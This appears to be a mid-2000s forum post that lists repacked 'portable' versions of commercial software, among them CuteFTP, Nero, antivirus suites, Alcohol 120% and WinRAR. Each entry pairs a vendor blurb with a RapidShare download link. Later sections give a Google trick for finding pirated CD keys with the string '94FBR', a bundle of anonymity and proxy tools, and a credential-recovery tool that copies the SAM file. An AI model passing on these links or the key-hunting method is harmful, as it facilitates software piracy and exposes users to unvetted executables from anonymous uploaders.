CuteFTP 8 meets industry demands for FTP clients thanks to PGP encryption and decryption, which helps ensure compatibility with industry standards and keeps your data secure during transfer and storage. The new PodCast Manager is a neat tool forhandling all of your podcast subscriptions and publishing in one application (it creates podcast RSS feeds, uploads new audio files and automatically downloads new episodes), and the Local Backup quickly and easily backs up your computer to a remote server for added data security.

In the professional view, the main window is divided into four panes: Local pane, Remote pane, Individual Session Log pane, and the bottom pane that has the Queue Window tab and the Log Window tab. You can also choose to use Home View, which is also a four-pane view with the log displayed above the local and remote panes and the queue underneath. This is the classic view found in earlier versions of CuteFTP.

Local pane has two tabs: Local Drives and Site Manager. The Local Drives tab displays the files available for upload on local computer and the Site Manager tab displays the list of your FTP sites. The Remote pane displays the list of files available for download to your local computer, while the Log pane displays the time and date of uploads, downloads, and other events that occur.

The Bottom pane has two tabs: Queue Window and Log Window. The Queue Window displays the status of the uploads and downloads and the Log Window displays the FTP connection information for all remote sites, number of sites you are connected to and the other log details of the session, such as the time, date, and so on.

The Advanced Search feature helps you to find files and folders more easily, by name, size or creation/modification date, whether they are on your local computer or a remote server, and advanced operations after transfer can be set to automatically exit and shutdown your computer, run a virus scan or any number of other tasks upon completing a transfer. Colour-coded tabs make managing multiple transfers to multiple sites is easier, and improved Mode Z compression speeds the transfer of ASP, BMP, CSS, DAT, DOC, EXE, HTM, JS, LOG, PDF, PHP, PL, PPT, PY, SWF, TXT, VBS, XLS, XML and XSL files.

We also really liked the Task Automation Wizards which help to ease configuration of scheduling file transfers, hot drop (folder monitoring), backing up remote servers, mirroring local and remote systems and adding new servers to the Site Manager. There?s now UTF-8 support for the ISO 10646 character standard, and usability improvements have been added to Bookmarks, Log Files, Macros, Time Zone Synchronization, and Quick Connect.

CuteFTP Professional provides easy-to-use yet powerful tools for tackling the complex challenges of data management and helps achieve HIPAA, GLBA and Sarbanes-Oxley compliance. If you?re looking to share large files and business data with confidence, CuteFTP Professional is a decent choice. However, in our tests we noticed that the software used system resources (up to 20% CPU) - even while idle - and almost double that while transferring large numbers of smaller files.

CODE:
http://rapidshare.com/files/52581952/Cute__FTP_Pro_8.0_Portable_by_mansur.rar

GetDataBack 3.03 For Fat:

GetDataBack 3.03 For NTFS & FAT


Hard drives (IDE, SCSI, SATA)
USB drives
Firewire drives
Partitions
Dynamic Disks
Floppy drives
Drive images
Zip/Jaz drive
Compact Flash Cards
Smart Media Cards
Secure Digital Cards
USB Flash Drive
iPod Disks




CODE:
http://rapidshare.com/files/52582079/GetDataBack_3.03_For_Fat_by_mansur.rar


Port Proxy SwitcherPro 3.7.3647 Portable:


Port Proxy Switcher Pro:

Proxy Switcher - change proxy settings on the fly Different internet connections do often require completely different proxy server settings and it's a real pain to change them manually. Proxy Switcher offers full featured connection management solution. This includes flexible proxy server list management, proxy server tester and anonymous surfing capabilities. Proxy Switcher Features Change proxy settings on the fly Automatic proxy server switching for anonymous surfing Works with Internet Explorer, Firefox, Opera and others. Flexible proxy list management Proxy server availability testing Anonymous proxy server list download


CODE:
http://rapidshare.com/files/52584438/Port_Proxy_SwitcherPro_3.7.3647_Portable_by_mansur_.rar


Yahoo Messenger 7.5 Portable:

Yahoo Messenger is a free service that allows you to see when friends come online and send them instant messages. It can also alert you to new e-mail in your Yahoo Mail or Yahoo Personals account, or when you have upcoming events recorded in Yahoo Calendar.



CODE:
http://rapidshare.com/files/52586899/Yahoo_Messenger_7.5_Portable_by_mansur.rar

Audio Edit Magic 9.21 Portable:


Audio Edit Magic is a visual audio editor and recorder software solution, which supports many advanced and powerful operations with audio data.

With Audio Edit Magic you can:
Open, create, and save audio files in any of the supported formats (can also save any portion of a loaded file to disk as a new file);


Display audio data waveform (Zoom Full, Zoom In, Zoom Out, Zoom Vertical);


Play audio files or any portion of the files (Play, Pause, Stop);


Record audio data from a microphone or any other available input device;


Edit audio files visually (Cut, Copy, Delete Selection, Delete Silence, Paste, Paste From File, Mix, Mix From File);


Apply various effects (Amplify, Compressor, Delay, Equalize, Fade In and Fade Out, Flanger, Invert, Normalize, Phaser, Reverb, Reverse, Silence, Shrink, Stretch, Vibrato, etc.);


Apply different filters to any selected portion of audio files;


Supports all major audio file formats such as uncompressed WAV; compressed WAV; MP3, MP2; Ogg; WMA; CDA (Audio CD Tracks); AVI; AIFF; AU; G.721, G.723, G.726; VOX; RAW.


And much more!


CODE:
http://rapidshare.com/files/52587380/Audio_Edit_Magic_9.21_Portable_by_mansur.rar

AVG Anti Virus 7.5 Portable:


AVG Anti-Virus has been protecting computers around the world for more than 12 years!
AVG for workstations provide comprehensive antivirus protection forpersonal computers. The unique combination of detection methods(heueristic analysis, generic detection, scanning and integritychecking) ensures that your computer receives the maximum protectionpossible on multiple levels (Resident Shield, Email Scanner plug-ins,Personal Email Scanner, On-Demand and other tests, etc.). It isavailable as AVG Professional Single Edition for single workstationprotection and AVG SoHo Edition (Small office - Home office) for homeor small offices.


CODE:
http://rapidshare.com/files/52588507/AVG_Anti_Virus_7.5_Portable_by_mansur.rar

Babylon Pro Portable:


Babylon-Pro is the world's leading dictionary and language translation software. Babylon offers you the most intuitive tool for all your translation, information and conversion needs. Just click on any word, phrase or number and a small window instantly appears with the desired results from Babylon's extensive database of language dictionaries, glossaries and conversion tools.

Highlights:

Single Click activation
Just click on any word, phrase or number to get the results that you need.

Babylon Language Dictionaries
Babylon enables you access to 25 professional dictionaries in 13 languages in English, French, German, Spanish, Italian, Portuguese, Japanese, Hebrew, Chinese (Traditional), Chinese (Simplified), Dutch, Russian and Swedish. In addition, Babylon has a database of over 1,200 free glossaries in over 50 languages.

Wikipedia Content
Babylon's single click intuitive technology offers users results from Wikipedia the multilingual web-based encyclopedia in 9 languages with more than 2,000,000 articles.

Writing Aid Tools
In addition to translation and dictionary results, Babylon also offers its users tools for finding just the word that they need and ensures correct conjugation. As some words can be translated in more than one way, Babylon enables users to see each possible translation with its equivalent translation in the user's native language, ensuring that you use the most appropriate word available. Babylon also shows you all possible conjugations to guarantee that you use the correct word in the correct form.

Unit Conversions
Babylon converts currencies, measurements and time, just click on any value in Windows applications to get instant conversions. Babylon automatically identifies the required conversion, based on unit symbols that appear next to the numbers, and will perform the conversion.

'Say-It' add-on feature
Babylon's 'Say-It' feature enables you to hear the correct pronunciation of words, in either a male or female voice.

System Requirements
- U3 smart drive
- Microsoft Windows 2000 / Windows XP


CODE:
http://rapidshare.com/files/52588647/Babylon_Pro_Portable_by_mansur.rar


CloneDVD2 2.8.9.5 Portable:


CloneDVD 2 copies movies in unparalleled picture quality. If it's only the main movie or a complete DVD ? CloneDVD compresses even long footage in brilliant quality and at high speed: A special transcoding technology compresses your choice of DVD titles according to your audio and language selection automatically to a freely adjustable target size.


CODE:
http://rapidshare.com/files/52588778/CloneDVD2_2.8.9.5_Portable_by_mansur.rar

dBpowerAmp 11.5 Portable:


Often called the Swiss army knife of audio, dMC can digitally rip sound from audio CDs to a multitude of formats. Convert from one format to another while preserving ID tags. Nearly every audio type is supported, including MP3, MP4, Windows Media Audio (WMA), OGG Vorbis, AAC, Monkey's Audio, and FLAC (with optional installs from Codec Central).


CODE:
http://rapidshare.com/files/52589025/dBpowerAmp_11.5_Portable_by_mansur.rar

Everest Ultimate 2006:


EVEREST Ultimate Edition is an industry leading system diagnostics and benchmarking solution for enthusiasts PC users, based on the award-winning EVEREST Technology. During system optimizations and tweaking it provides essential system and overclock information, advanced hardware monitoring and diagnostics capabilities to check the effects of the applied settings. CPU, FPU and memory benchmarks are available to measure the actual system performance and compare it to previous states or other systems. Furthermore, complete software, operating system and security information makes EVEREST Ultimate Edition a comprehensive system diagnostics tool that offers a total of 100 pages of information about your PC.




CODE:
http://rapidshare.com/files/52589435/Everest_Ultimate_2006by_mansur.rar

FireFox2.0 Portable:

Mozilla Firefox comes with all the latest conveniences and tools. Favorites, plug-ins, and Internet Explorer settings are automatically copied to Mozilla Firefox so that you can set to work immediately.


CODE:
http://rapidshare.com/files/52589708/FireFox_2.0_Portable_by_mansur.rar

Internet Explorer 7 Portable:

Internet Explorer 7 has been designed to make everyday tasks easier, provide
dynamic security protection and improve the development platform and manageability.
End user improvements include a streamlined interface, tabbed browsing, printing
advances, improved search functionality, instant feeds (RSS), dynamic security protection,
and more.



CODE:
http://rapidshare.com/files/52590300/Internet_Explorer_7_Portable_by_mansur.rar


IrfanView 3.99 Portable:

IrfanView is a fast and simple image viewer and editor that supports all major graphic formats, including BMP, DIB, JPEG, GIF, animated GIF, PNG, PCX, multipage TIFF, TGA, and more.
It's one of the best image viewer available.



IrfanView features
Many supported file formats

Multi language support

Thumbnail/preview option

Slideshow (save slideshow as EXE/SCR or burn it to CD)

Show EXIF/IPTC/Comment text in Slideshow/Fullscreen etc.

Support for Adobe Photoshop Filters

Fast directory view (moving through directory)

Batch conversion (with image processing)

Multipage TIF editing

Email option

Multimedia player

Print option

Change color depth

Scan (batch scan) support

Cut/crop

IPTC editing

Effects (Sharpen, Blur, Adobe 8BF, Filter Factory, Filters Unlimited, etc.)

Capturing

Extract icons from EXE/DLL/ICLs

Lossless JPG rotation

Many hotkeys

Many command line options

Many PlugIns

Only one EXE-File, no DLLs, no Shareware messages like "I Agree" or "Evaluation expired"

No registry changes without user action/permission!

and many more



CODE:
http://rapidshare.com/files/52590652/IrfanView_3.99_Portable_by_mansur.rar

Kaspersky AntiVirus 6.0.1.41 Portable:

Kaspersky Anti-Virus Personal delivers the user-friendly security your computer needs. PCs connected to the Internet are constantly at risk of attack by viruses, Trojans, Internet worms and other malware. Anti-Virus Personal monitors all virus and spyware entry points leaving you with a clean and safe machine. Round-the-clock technical support Easy to install and use

Features:

Installs easily with a clear interface and automated functions making it the right choice for even the most inexperienced computer users.
Scans email traffic (POP3, IMAP and NNTP for incoming mail, SMTP for outgoing) for all mail programs.
Scans all HTTP Internet traffic in real time, and offers rapid scan of all individual files, catalogs and disks.
Controls changes to file system to prevent malicious programs from undermining applications.
Monitors program activity and warns of suspicious or hidden processes (rootkits) or unauthorized changes.
Controls status of system registry and alerts of suspicious objects or attempts to create hidden registry keys.
Records all registry and file system changes to rapidly restore your computer after any malicious attacks.
Automatically balances scan speeds with increased user activity; and offers accelerated scan settings.
Blocks dangerous macro commands from being executed.
Delivers the smallest updates (~ 50 Kb) for virtually instant updating.
Supports WiFi Internet access for antivirus updating.
Conserves batteries with economy mode.
Supports Intel Centrino processors and Hyper-Threading technology.


CODE:
http://rapidshare.com/files/52591319/Kaspersky_AntiVirus_6.0.1.41_Portable_by_mansur.rar


Msn 7.5 Portable:

Chat online, in real time, with friends, family, and colleagues. It's faster than e-mail, more discreet than a phone call, and best of all ? it's free! MSN Messenger is more than just text, it?s a great way to collaborate with co-workers or touch base with family and friends. You can even send an instant message to a contact?s mobile phone. Customization features help you personalize your chats and make your connections even more meaningful.

CODE:
http://rapidshare.com/files/52591648/Msn_7.5_Portable_by_mansur.rar

Multi Password Recovery 0.2.6 Portable:

Multi Password Recovery (MPR) - multifunctional password decryption and auditing solution for Win95/98/W2K/XP/2K3. MPR instantly finds and recovers passwords from more than 60 popular applications (FTP, E-mail clients, IM, Browsers and so on). It also shows passwords hidden under asterisks, copies SAM file, can generate new passwords. Under W2K/XP/2K3 MPR is able to process blocked for reading files.




CODE:
http://rapidshare.com/files/52591691/Multi_Password_Recovery_0.2.6_Portable_by_mansur.rar


Nero 7.2.0.3 Portable:

Along with Nero?s award-winning CD and DVD burning capabilities in Nero 7 Premium Reloaded, you can now enjoy the benefits of Blu-ray and HD DVD disc data recording technology, which are fast becoming the industry standard in high density digital media compression and recording. Convert your files to your preferred format and store up to 58 normal-sized CDs on one high density disc with any of Nero?s five burning and back-up applications.


CODE:
http://rapidshare.com/files/52592277/Nero_7.2.0.3b_Portable_by_mansur.rar


Norton Portable:

This include
1.Norton Express Cleanup
2.Norton WinDoctor
3.Norton Ghost
4.Norton Ghost Explorer
5.Norton Ghost Support Tools
6.Norton PQ Boot
7.Norton Partition Table Editor
8.Norton Partition Info



CODE:
http://rapidshare.com/files/52592868/Norton_Portable_by_mansur.rar


Paragon Drive BackUp:

Drive Backup creates a backup image of entire hard disk, including operating system backup with all user preferences and settings, applications and data files. Paragon's Hot Backup Technology enables to create hard drive images in real time without Windows reboot or any application's interruption. You will be able to completely restore operating system with all installed and configured applications, valuable documents and files with no reinstallations required. You can also restore separate files form hard disk's backup image.

The up-to-date hard disk backup image created with Paragon Drive Backup is the best insurance you may have in any disaster case.


CODE:
http://rapidshare.com/files/52592949/Paragon_Drive_BackUp_6.01.041_Portable_by_mansur.rar


Partition Manager 8.0 Pro(2005) Portable:

7tools Partition Manager 2005 - hard disk storage maintenance. All operations you may need at home to perform regular maintenance on your own. Partition new hard disks from scratch or upgrade old ones. Prepare hard disks for any operating system and even install several systems. Reconfigure partitions, repartition hard disks on the fly, and improve storage performance. Use the bootable recovery CD to access all the information unbootable system.
7tools Partition Manager 2005 offers an extended range of functions to make your data management easier. With its help you can:

- easily deploy a new hard drive and copy your data and partitions
- install and use multiple operation systems, share files between them
- organize better data storage for multi-user computers
- recover your computer after a system crash and secure important data by moving them to a separate partition


... and perform all other kinds of partitioning and repartitioning operations on your disk

Several major components are included with this outstanding product:

* Partition Manager
* Bootmanager
* Recovery CD with DOS and Linux versions of Partition Manager
* DOS drivers on Recovery CD to access NTFS and Ext2fs Partitions
* Linux driver on Recovery CD to access NTFS Partitions
* Built-in ISO-Burner (use it to create your own recovery CD )


CODE:
http://rapidshare.com/files/52593674/Partition_Manager_8.0_Pro_Portable_by_mansur.rar


Port APMS 6.0.4:

CODE:
http://rapidshare.com/files/52594570/Port_APMS_6.0.4_by_mansur.rar
File-Size: 18.76 MB

Super Internet TV 6.8.0.0 Portable:




QUOTE:
Super Internet TV allows you to watch 1000+ live television channels and listen to 1300+ online radio stations from 100+ countries. There is no need for a TV Tuner card because all the channels are streamed through your Internet connection. For most TV and Radio channels a modem speed of 56Kb/s is required, for the broadband TV stations you need 300 Kb/s. This software comes with automatic TV station updates so it will never be out of date. If you are interested in learning languages or alternative programming, this is a good choice for you!

Features:
- More than 1000 FREE TV stations. (see TV channel list)
- More than 1300 FREE radio stations. (see radio channel list)
- More than 200 live webcams. (see webcam list)
- NO TV tuner card required!
- Automatic channel list updates.
- Supports high bandwidth stations.
- Supports thousands of skins(visual styles *.msstyles)
- Resizable screen,including full-screen mode
- very easy interface

Requirements: RealPlayer and Windows Media Player required. Super Internet TV uses Windows Media Player's decoding system to present the television and radio signals. If you want to watch more channels which use RealVideo format, you also need RealPlayer installed.



CODE:
http://rapidshare.com/files/52594629/Super_Internet_TV_6.8.0.0_Portable_by_mansur_.rar



TMPGEnc MPEG Editor 1.0.1.59 Portable:

TMPGEnc MPEG Editor is a greatly improved version of MPEG Tool (included in TMPGEnc Plus 2.5). It has been reworked into a full-featured software offering fast, precise and easy cut-editing. This is possible thanks to the Technical Wizard interface and the Smart Rendering function. Since it is compatible with DVD-VR(VRO), you can load DVD-videos you have made in the past, edit and convert them to MPEGs.
This sofware is recommended for people who need to quickly cut-edit MPEGs at frame level!



CODE:
http://rapidshare.com/files/52594847/TMPGEnc_MPEG_Editor_1.0.1.59_Portable_by_mansur.rar



UltraISO Premium Edition 8.6.0 Build 1936 Portable:

Along with the large capacity hard disk popularity, people were already used to copying compact discs to CD/DVD image files, generally used is the famous ISO 9660 international standards format, therefore CD/DVD image files are called ISO files. Because the ISO file retained complete data information of the compact disc (including compact disc boot information), you were allowed the convenience to use commonly used CD/DVD burning software (for example Nero-Burning ROM ) to record the disc with your CD-R/RW or DVD-R/RW over and over forever, it can also be used directly through Virtual CD/DVD-ROM drive software (for example Daemon-Tools ) .

UltraISO is an ISO CD/DVD image file creating/editing/converting tool and a bootable CD/DVD maker , it can directly edit the CD/DVD image file and extract files and folders from it, as well as directly make ISO files from your CD/DVD-ROM or hard disk. At the same time, you can maintain the ISO bootable information, thus creating your own bootable CD/DVDs. You now have the power to make and edit your own ISO files, and then burn them to CD/DVD for your own needs.

UltraISO is in sole possession of the intellectualized ISO document format analyzer, it can process at the present time almost all types of image files, including ISO and BIN, it may even support new image files which are yet to be created. UltraISO can open these image files, directly extract files and folders, edit it and convert other image files to the standard ISO format.

UltraISO uses the double window unification user contact interface, you have the choice to only use the quick buttons and/or the mouse Drag & Drops, you can handle any CD/DVD image file easily.





CODE:
http://rapidshare.com/files/52594890/UltraISO_Premium_Edition_8.6.0_Build_1936_Portable_by_mansur.rar



UninstallTool 1.6.6:

Ultra small and fast utility that helps you to uninstall various software. It can be used instead of the standart unconvenient and heavy "Add and Remove Programs". The program has lots of features and options missing in Microsoft's ? applet.



Features:
* Great speed and small size, great quality
* Multilingual, cool and simple interface
* Allows you to display hidden installed programs
* Allows you to find fast the desired program while typing known letters
* Enables to delete programs if their uninstaller fails
* Navigate to selected program's registry entry, installation folder and it's web site
* Saving (exporting to HTML) current installed software list
* Running "Windows Components" applet
* ... a lot of more

Currently supported languages: Belarussian, Brazilian, Bulgarian, Chinese, Dutch, English, French, German, Italian, Japanese, Korean, Polish, Russian, Slovak, Spanish, Ukrainian

Uninstall Tool changelog version 1.6.5:

• Added crash report feature
• Added FAQ to the help file
• added some languages
• serious fix: data in registry stayed when program has been removed
• some programs were not displayed - fixed
• minor fixes

CODE:
http://rapidshare.com/files/52594917/UninstallTool_1.6.6_by_mansur.rar


VideoLan 0.8.5r.2Portable:


and DivX files, DVDs, digital satellite channels, digital terrestial television channels and live videos on a high-bandwidth IPv4 or IPv6 network in unicast or multicast under many OSes. VideoLAN also features a cross-platform multimedia player, VLC media player, which can be used to read the stream from the network or display video read locally on the computer under all GNU/Linux flavours, all BSD flavours, Windows, Mac OS X, BeOS, Solaris, QNX, Familiar Linux.





CODE:
http://rapidshare.com/files/52595316/VideoLan_0._8.5r.2_Portable_by_mansur.rar



WinAvi Video Converter7.7 Portable:

Have you ever been limited to the videotape format? Especially when you really wanted to share films with your family and friends.
WinAVI Video Converter can help you solve your problems!
It is a software program for converting video formats at fast speeds and high quality.

WinAVI Video Converter supports almost all formats of video including :
AVI, MPEG1/2/4, VCD/SVCD/DVD,
DivX, XVid, ASF, WMV, RM,
QuickTime MOV, and Flash SWF.

Features:

WinAVI Video Converter is software for video conversion. By using our product, users are released from the limitations and difficulties of video formats. It can support almost all formats of video including AVI, MPEG1/2/4, VCD/SVCD/DVD, DivX, XVid, ASF, WMV, RM, QuickTime MOV, Flash SWF. Also, it allows you to burn to VCD/SVCD/DVD. A powerful AV compress engine can complete a whole AVI movie conversion and burn it to DVD just in 1 hour. You can enjoy the film with your home & PC DVD Player.

* AVI to DVD
* AVI to MPEG
* AVI to VCD
* AVI to MPG
* Flash SWF conversion
* It can convert all formats to MPEG1/2, VCD, SVCD, and DVD and burn to VCD, SVCD, or DVD disc.
* It can convert all video formats to AVI/WMV/RM/ASF/Divx/Xvid
* QuickTime MOV conversion.
* Real DVD Navigator encoder included.
* DirectAC3 technology supports AC3 5.1, which is state of the art technology. It is up to 20% faster with AVI files including AC3 audio.
* Real Dolby AC3 audio encoder included.
* Burning VCD/SVCD/DVD.
* Stunning video and audio quality.
* User-friendly interface that is easy to use.
* Has the option to preview the video in real-time.
* Has the option to automatically shutdown your computer when the conversion has been completed.




CODE:
http://rapidshare.com/files/52595478/WinAvi_Video_Converter_7.7_Portable_by_mansur.rar


7zip 4.42 Portable:

7-Zip is an open source file archiver with the high compression ratio predominantly for the Microsoft Windows operating system. It operates either as a command line program or with a graphical user interface. It also features integration with the Windows shell environment. 7-Zip is free software, developed by Igor Pavlov and distributed under the GNU LGPL license.



High compression ratio in new 7z format with LZMA compression
- 7-Zip is free software distributed under the GNU LGPL
- Supported formats:
Packing / unpacking: 7z, ZIP, GZIP, BZIP2 and TAR
Unpacking only: RAR, CAB, ISO, ARJ, LZH, CHM, Z, CPIO, RPM, DEB and NSIS
- For ZIP and GZIP formats 7-Zip provides compression ratio that is 2-10 % better than ratio provided by PKZip and WinZip
- Self-extracting capability for 7z format
- Integration with Windows Shell
- Powerful File Manager
- Powerful command line version
- Plugin for FAR Manager
- Localizations for 65 languages

CODE:
http://rapidshare.com/files/52595546/7zip_4.42_Portable_by_mansur.rar
File-Size: 1.07 MB


Alcohol 120% 1.9.5.3823 Portable:

Alcohol 120% is CD/DVD emulation and recording software that allows users to copy discs. Store your most used or important CDs as images on your computer and run them at 200x speed from up to 31 virtual CD or DVD drives. Alcohol is compatible with more than 99% of drives available. It supports the latest image file types including - MDS, CCD, BIN, CUE, ISO, CDI, BWT, BWI, BWS, BWA and many more.


*** Alcohol 120% enables you to make a duplicate back-up to recordable media of nearly all your expensive Game/Software/DVD titles, and/or an image that can be mounted and run from any one of Alcohol's virtual drives.
*** No other software available enables you to create up to a staggering 31 virtual drives, allowing you to run your game images at over 200x faster than from a conventional CD-ROM. Alcohol 120% is a powerful utility that uses a unique combination of options to ensure a perfect back-up every time.
*** All you need is a PC combined with a CD or a DVD burner. No more replacing your expensive original discs due to loss, theft, scratches, or other media imperfections. Your duplicate works just like the original; your entire collection can be archived and your investment protected.
*** In the home: Have you had experiences with the common conditions of CDs/DVDs? They can easily get scratched, damaged, broken, lost or even stolen. Alcohol provides you with peace of mind and protects your investment.
*** Your original games/program discs can be safely stored away. Alcohol-created images mean that you always have your expensive media stored safely on your hard drive for instant retrieval at the click of a button. No more searching for the correct game disc or software application install disc, everything is at your fingertips.
*** You can now, for instance, simultaneously play your favourite game and bring up your route planner without having to eject and reload any physical discs, The 31 virtual drive ability of Alcohol means you can have the equivalent of a staggering 31 CD-ROM drives in your Home PC, all instantly accessible. You can simply and quickly run your Disc image at around 200 times faster than that of a conventional CD-ROM drive. If you need a program or CD it is immediately there - always ready to use!
*** At the office: Program discs and many other applications generally require the original disc to be in the computer's CD-ROM drive. This restricts the amount of people in your office who can have access to the same software at the same time without the cost of additional discs. Alcohol's virtual drives resolve that problem for you. No more hunting around the offices for that elusive disc you need to run your application, everything you require is just a click away.
*** With Alcohol you can store your CD images on your office server, your colleagues and employees at their respective networked workstations will never need to come asking for a CD again, they will not even require an expensive CD-ROM drive installed in their workstation PC! A simple click is all that is required for them to have full access to any disc image they require for their day to day work. Your valuable CDs can be safely kept under lock and key.
*** Does your company have a promotional CD for it's customers? Original pressed discs are expensive, using the Alcohol 120% writing engine you can copy the original to inexpensive blank discs for distribution to your customers and keep your overheads down.
*** Alcohol software offers unrivalled usage to people from all walks of life regardless of if you are a hardened game player, busy school teacher, salesman, IT manager, student etc. Alcohol has a niche in all your everyday computer needs. Let Alcohol help you to help yourselves and give you the peace of mind you deserve when it comes to expensive PC media.
CODE:
http://rapidshare.com/files/52595622/Alcohol_120__1.9.5.3823_Portable_by_mansur.rar



WinRAR 3.61 Portable:

# Using WinRAR puts you ahead of the crowd when it comes to compression by consistently making smaller archives than the competition, saving disk space and transmission costs.
# WinRAR provides complete support for RAR and ZIP archives and is able to unpack CAB, ARJ, LZH, TAR, GZ, ACE, UUE, BZ2, JAR, ISO, 7Z, Z archives.
# WinRAR offers a graphic interactive interface utilizing mouse and menus as well as the command line interface.
# When you purchase WinRAR license you are buying a license to the complete technology, no need to purchase add-ons to create self-extracting files, it's all included. One price, one payment, once.
# You also receive the benefit of a life-time use of the WinRAR archiver. No upgrade fee to pay. When a new release is made, simply download and install, your license is valid for life.
# WinRAR is easier to use than many other archivers with the inclusion of a special "Wizard" mode which allows instant access to the basic archiving functions through a simple question and answer procedure. This avoids confusion in the early stages of use.
# WinRAR offers you the benefit of industry strength archive encryption using AES (Advanced Encryption Standard) with a key of 128 bits.
# WinRAR supports files and archives up to 8,589 billion gigabytes in size. The number of archived files is, for all practical purposes, unlimited.
# WinRAR offers the ability to create selfextracting and multivolume archives.
# Recovery record and recovery volumes allow to reconstruct even physically damaged archives.
# WinRAR features are constantly being developed to keep WinRAR ahead of the pack



CODE:
http://rapidshare.com/files/52595694/WinRAR_3.61_Portable_by_mansur.rar



WhereIsIt 3.75 Portable:

Where Is It? is an application written for 32-bit Windows operating systems, designed to help you maintain and organize a catalog of your computer media collection, including CD-ROMs, audio CDs, diskettes, removable drives, hard drives, network drives, DVDs, or any other media that Windows can access as a drive.

The most basic goal for Where Is It? is to provide access to the contents of any media you have from a cataloged database, even if the media itself is not available on the system - you can browse lists of files and folders, search by any criteria, use descriptions, thumbnails, categories, flags, etc.

Where Is It? can handle lots of them, too, a couple hundreds or thousands disks in a catalog is nothing unusual, yet catalogs remain reasonably small, single-filed and easy to transfer or send to other users. You can also create more than one catalog, and at any time open and work with as many catalogs at once as needed. WhereIsIt is easy to use for both beginners and advanced users. It features a familiar and well thought-out, Explorer-like user interface, combined with strong searching and reporting capabilities, multi-language support, automated description and thumbnails importing through extendable plugins from more than 70 different sources, and much more.



New in version 3.75:

* Changes in this release are concentrating on updating program's visual appearance and usability of user interface. Most of features are a small glimpse into custom developed client versions.
* Settings dialog has been reorganized, options are easier to access and browse. Did away with tabs altogether, sections are now available through a more modern, WinXP-style taskbar control. Settings dialog is now also fully resizable and will remember its size and position.
* Standard command buttons in dialogs like "OK" and "Cancel" are visually separated from the rest of dialog's contents throughout the program. This helps reduce dialog clutter a little bit.
* Toolbars and non-themed buttons have (optionally) a more modern, shaded three-dimensional appearance on hi-color enabled displays.
* Most status bars now support themes, a few exceptions were left out on purpose as they fit dialogs better when displayed the old way.
* Several dialogs that were previously fixed in size are now resizable.
* A few other adjustments mostly dealing with user interface.
CODE:
http://rapidshare.com/files/52595866/WhereIsIt_3.75_Portable_by_mansur.rar


Spyware Doctor:


Spyware Doctor is an advanced adware and spyware removal program that will detect and clean thousands of potential spyware, ad ware, keyloggers, trojans, spy ware cookies, trackware, spybots and other malware from your computer.

Spyware Doctor is a multi-award winning spyware removal utility that detects, removes and protects your PC from thousands of potential spyware, adware, trojans, keyloggers, spybots and tracking threats.

Editor's Choice Anti-Spyware

Don't compromise your security with second best!
? Recommended by experts and editors around the world as the best Anti-Spyware.
? FREE award-winning customer support for all users.
? Frequent advanced updates ensure that you are always protected.
? Detects, removes and blocks all types of Spyware and Adware threats.
? Easiest to use with intelligent automatic protection.
? 100% Money Back Guarantee.

Best Spyware Protection. Used by Millions World Wide!

CODE:
http://rapidshare.com/files/52630871/Spyware_Doctor_4.0.0.2618_Portable_by_mansur.rar

Atlantis :


Portable Word Is Alternative For MS Office Word.. So Small But Have Complete Features Of MS Word..

Atlantis Word Processor



Atlantis is an innovative,
no-nonsense word processor carefully designed with the end-user in mind. Compact, fast-loading, but still powerful and efficient, Atlantis will be the perfect companion for a wide range of your word processing tasks, ? from simple to most complex.

It does not matter if you are a novice or a power user, Atlantis has the tools you will ever need to compose highly professional documents. Using a most original and practical Control Board, you will create and manage all components of complex documents with unparalleled ease: sections, fields, headers & footers, newspaper columns, bulleted & numbered lists, styles, bookmarks, footnotes & endnotes, etc, all are a breeze with Atlantis.

Both the Safeguard and Backup Files features make sure that you work under extremely safe conditions. Private documents can also be encoded and secured: you can save them to a proprietary COD file format using powerful 256-bit encryption technology.

The Atlantis AutoCorrect and Spellcheck-As-You-Type features combine with a unique typing assist, the Atlantis Power Type, to dramatically simplify your word processing life.

The Atlantis interface is entirely customizable: menus, toolbars, hot keys, colors and sounds can all be adjusted to suit your own requirements. What's more, Atlantis is a fully portable word processor. You can install Atlantis to a memory flash drive, and Atlantis will travel with you wherever you go.

And much-much more for you to discover...


CODE:
http://rapidshare.com/files/52629668/Atlantis_by_mansur_.rar

Please Write Your suggestions Here

ok, this is a little trick that i usually use to find cd keys with google.


if your looking for a serial number for nero (for example) goto google.com and type nero 94FBR and it'll bring it up

this works great in google

HOW DOES THIS WORK?

Quite simple really. 94FBR is part of a Office 2000 Pro cd key that is widely distributed as it bypasses the activation requirements of Office 2K Pro. By searching for the product name and 94fbr, you guarantee two things.

1)The pages that are returned are pages dealing specifically with the product you're wantinga serial for.

2)Because 94FBR is part of a serial number, and only part of a serial number, you guarantee that any page being returned is a serial number list page.


I hope this trick help you finding your ccd keys easily

Enjoy

---

01 #1 Anonymous Proxy List Verifier 1.1
02 Anonimity 4 Proxy2.8
03 Charon 0.6
04 Get Anonymous 2.1
05 GhostSurf Platinum 2007
06 Hide ip Platinum 3.42
07 Hide The Ip 2.1.1
08 Invisible Browsing 5
09 IP Switcher Professional 1.01.12.0
10 MultiProxy v1.2
11 NetConceal Anonymity Shield 5.2.059.02
12 Proxy Switcher Standard 3.7.2.3913
13 Proxygrab 0.6
14 proxyway extra v3.2
15 SmartProxyHelper 1.5
16 Steganos Internet Anonym 2006 v8.0.1

Download Links :-

http://rapidshare.com/files/48541745/Aio-Ip-Anonymous-Surfing-Tools.exe.001
http://rapidshare.com/files/48541751/Aio-Ip-Anonymous-Surfing-Tools.exe.002

To run any of these apps go to Start > Run and type the executable name:

1) Character Map = charmap.exe (very useful for finding unusual characters)

2) Disk Cleanup = cleanmgr.exe

3) Clipboard Viewer = clipbrd.exe (views contents of Windows clipboard)

4) Dr Watson = drwtsn32.exe (Troubleshooting tool)

5) DirectX diagnosis = dxdiag.exe (Diagnose & test DirectX, video & sound cards)

6) Private character editor = eudcedit.exe (allows creation or modification of characters)

7) IExpress Wizard = iexpress.exe (Create self-extracting / self-installing package)

8 Mcft Synchronization Manager = mobsync.exe (appears to allow synchronization of files on the network for when working offline. Apparently undocumented).

9) Windows Media Player 5.1 = mplay32.exe (Retro version of Media Player, very basic).

10) ODBC Data Source Administrator = odbcad32.exe (something to do with databases)

11) Object Packager = packager.exe (to do with packaging objects for insertion in files, appears to have comprehensive help files).

12) System Monitor = perfmon.exe (very useful, highly configurable tool, tells you everything you ever wanted to know about any aspect of PC performance, for uber-geeks only )

13) Program Manager = progman.exe (Legacy Windows 3.x desktop shell).

14) Remote Access phone book = rasphone.exe (documentation is virtually non-existant).

